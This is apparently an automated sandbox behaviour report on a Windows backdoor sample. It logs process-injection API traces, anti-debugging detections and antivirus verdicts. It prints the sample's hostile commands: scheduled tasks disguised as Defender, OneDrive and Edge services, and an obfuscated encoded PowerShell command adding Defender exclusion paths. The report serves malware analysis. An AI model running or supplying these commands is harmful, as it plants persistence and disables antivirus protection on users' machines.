NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74742000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ec81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ec44000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ec81000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ec82000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02651000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02523000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02524000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f2c1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x67aa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02526000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02548000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02549000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 21, 2022, 9:46 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (15 events)

cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	powershell -EncodedCommand "PAAjAFkAVQB6AFgAYwBqAGUAWgBKAFQASwByACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgBFAFQATQBTAGYAdgBBAHYAbABqAGkAUQByAEYAcwBSAE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGgAeABhAHEAVAB3AGEAZwBWAHYAZgAjAD4AIABAACgAIAA8ACMAZQBHAFcAQgBRAEQATABDAHoATgBRAFUAQwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZgBqAEgARQBtAGYATABZAEYASABxAGwAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGQAUQBDAHMAZQBwAEYAdQBnAHoAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAEYAVwBFAEwAbwBCAFkAWgBjAFcAdgBaAGkAQwBXAFAAVABPACMAPgA="
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0005c400', u'virtual_address': u'0x00007000', u'entropy': 7.879024181426126, u'name': u'.data', u'virtual_size': u'0x0005c3e4'}

entropy

7.87902418143

description

A section with a high entropy has been found

entropy

0.921348314607

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Dec. 21, 2022, 9:46 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (14 events)

cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 00da052e4e95eeaea8c13e16842cdea5ffdf3f20

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Dec. 21, 2022, 9:45 a.m.	process_identifier: 2136 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0	0

Installs itself for autorun at Windows startup (14 events)

cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f

Manipulates memory of a non-child process indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1344 manipulating memory of non-child process 2136
NtAllocateVirtualMemory Dec. 21, 2022, 9:45 a.m.	process_identifier: 2136 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0	0
NtProtectVirtualMemory Dec. 21, 2022, 9:45 a.m.	process_identifier: 2136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 2 (PAGE_READONLY) base_address: 0x00400000 process_handle: 0x0000002c	1	0	0
NtProtectVirtualMemory Dec. 21, 2022, 9:45 a.m.	process_identifier: 2136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 372736 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00402000 process_handle: 0x0000002c	1	0	0
NtProtectVirtualMemory Dec. 21, 2022, 9:45 a.m.	process_identifier: 2136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 2 (PAGE_READONLY) base_address: 0x0045e000 process_handle: 0x0000002c	1	0	0
NtProtectVirtualMemory Dec. 21, 2022, 9:45 a.m.	process_identifier: 2136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 2 (PAGE_READONLY) base_address: 0x00460000 process_handle: 0x0000002c	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1344 injected into non-child 2136
WriteProcessMemory Dec. 21, 2022, 9:45 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2136 process_handle: 0x0000002c	1	1	0

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

Elastic	malicious (high confidence)
FireEye	Generic.mg.1b1bae0b503d1aa9
Cylance	Unsafe
CrowdStrike	win/malicious_confidence_100% (W)
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Rozena.BND
Cynet	Malicious (score: 100)
APEX	Malicious
Kaspersky	VHO:Backdoor.Win32.Agent.gen
McAfee-GW-Edition	BehavesLike.Win32.Generic.gc
Sophos	ML/PE-A
SentinelOne	Static AI - Suspicious PE
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	VHO:Backdoor.Win32.Agent.gen
Acronis	suspicious
Rising	Trojan.Rozena!8.6D (TFE:dGZlOgWA6HZ4B1eZ7Q)
BitDefenderTheta	Gen:NN.ZexaF.36158.zKW@aqRThDb
Cybereason	malicious.abdb48

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1344 called NtSetContextThread to modify thread in remote process 2136
NtSetContextThread Dec. 21, 2022, 9:45 a.m.	registers.eip: 2005598660 registers.esp: 1440080 registers.edi: 0 registers.eax: 4575150 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 2136	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1344 resumed a thread in remote process 2136
NtResumeThread Dec. 21, 2022, 9:45 a.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 2136	1	0	0

Executed a process and injected code into it, probably while unpacking (31 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Dec. 21, 2022, 9:45 a.m.	thread_identifier: 2140 thread_handle: 0x00000020 process_identifier: 2136 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000002c	1	1
NtGetContextThread Dec. 21, 2022, 9:45 a.m.	thread_handle: 0x00000020	1	0
NtAllocateVirtualMemory Dec. 21, 2022, 9:45 a.m.	process_identifier: 2136 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0
WriteProcessMemory Dec. 21, 2022, 9:45 a.m.	buffer: base_address: 0x00400000 process_identifier: 2136 process_handle: 0x0000002c	1	1
WriteProcessMemory Dec. 21, 2022, 9:45 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2136 process_handle: 0x0000002c	1	1
NtSetContextThread Dec. 21, 2022, 9:45 a.m.	registers.eip: 2005598660 registers.esp: 1440080 registers.edi: 0 registers.eax: 4575150 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 2136	1	0
NtResumeThread Dec. 21, 2022, 9:45 a.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 2136	1	0
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2820 thread_handle: 0x000000f4 process_identifier: 2816 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -EncodedCommand "PAAjAFkAVQB6AFgAYwBqAGUAWgBKAFQASwByACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgBFAFQATQBTAGYAdgBBAHYAbABqAGkAUQByAEYAcwBSAE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGgAeABhAHEAVAB3AGEAZwBWAHYAZgAjAD4AIABAACgAIAA8ACMAZQBHAFcAQgBRAEQATABDAHoATgBRAFUAQwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZgBqAEgARQBtAGYATABZAEYASABxAGwAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGQAUQBDAHMAZQBwAEYAdQBnAHoAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAEYAVwBFAEwAbwBCAFkAWgBjAFcAdgBaAGkAQwBXAFAAVABPACMAPgA=" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
NtResumeThread Dec. 21, 2022, 9:46 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2816	1	0
NtResumeThread Dec. 21, 2022, 9:46 a.m.	thread_handle: 0x0000032c suspend_count: 1 process_identifier: 2816	1	0
NtResumeThread Dec. 21, 2022, 9:46 a.m.	thread_handle: 0x00000484 suspend_count: 1 process_identifier: 2816	1	0
NtResumeThread Dec. 21, 2022, 9:46 a.m.	thread_handle: 0x000004e4 suspend_count: 1 process_identifier: 2816	1	0
CreateProcessInternalW Dec. 21, 2022, 9:46 a.m.	thread_identifier: 2984 thread_handle: 0x000000f4 process_identifier: 2980 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
